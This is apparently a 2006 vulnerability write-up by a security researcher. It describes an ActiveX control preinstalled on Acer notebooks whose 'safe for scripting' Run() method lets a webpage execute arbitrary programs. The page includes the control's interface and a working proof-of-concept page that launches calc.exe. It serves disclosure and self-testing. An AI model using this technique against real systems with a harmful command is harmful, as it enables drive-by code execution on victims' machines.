| Something Interesting? |
by Tan Chew Keong [en] [jp] 
What's Up?
Recently, I noticed that my Acer TravelMate 4150 notebook contains the LunchApp.APlunch ActiveX control, which is marked as "safe for scripting" and "safe for initializing from persistent data".
A quick check reveals that the control is part of the suite of applications that are distributed by default in Acer notebooks. And it is pretty old, dating back to November 1998. Oh well.... what is this ActiveX control doing on my notebook? And most importantly, what does it allow others to do to my notebook...
Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?
[
uuid(D9998BCF-7957-11D2-8FED-00606730D3AA),
version(1.0),
hidden,
dual,
nonextensible
]
dispinterface _APlunch {
properties:
methods:
[id(0x60030000)]
void Run(
[in, out] BSTR* Drive,
[in, out] BSTR* FileName,
[in, out] BSTR* CmdLine);
};
It isn't long before I'm using this control from a webpage to execute arbitrary commands on my notebook when the page is loaded in IE6. And it's too simple....
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
The last parameter of the Run() method allows command-line arguments to be passed to the executable. The next thing is to find out whether this control exists in other Acer notebooks, especially the newer ones. I was able to get hold of an Acer Aspire 5600, and truly, the control exists and it is also marked as "safe for scripting" and "safe for initializing from persistent data".
Luckily, the Acer Aspire 5600 notebook has already been updated to IE7. This prevents silent execution of the ActiveX control when the page is loaded, unlike IE6 on my Acer TravelMate 4150. However, once the user allows the ActiveX control to run, abusing of the "Run()" command would be possible.
An advisory was not issued as I've not extensively tested this on other Acer notebooks (e.g. those that are being sold outside of Singapore). However, both Acer notebooks that I've tested have "safe for scripting" and "safe for initializing from persistent data" enabled for this control. You can use the test page below to check whether your Acer notebook is affected.
Tested Systems
Both were purchased in Singapore.
Test Page
Use this test page that I have created to test whether it is possible to use the LunchApp.APlunch ActiveX control to run commands on your Acer notebook. Don't worry, this only runs the harmless calc.exe (calculator). The test assumes that you have calculator installed at c:\windows\system32\calc.exe, and you must use Internet Explorer (IE) Disclaimer: I'm not responsible for any harm that might be caused either directly or indirectly on your system as a result of using/visiting the test page. This page is provided for testing purposes only. By using the test page, you explicitly acknowledge that you are aware and give explict permission for the LunchApp.APlunch ActiveX control (D9998BD0-7957-11D2-8FED-00606730D3AA) to be used to run c:\windows\system32\calc.exe on your system, in order to test your system for the possibility that this control can be abused. To create the test page, copy the following into a HTML file, and either host it on a web server or open it directly using IE.
<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</html>
</body>
Change Log
2006-11-19 - Public Release. |
| Contact |
| For further enquries, comments, suggestions or bug reports, simply email them to |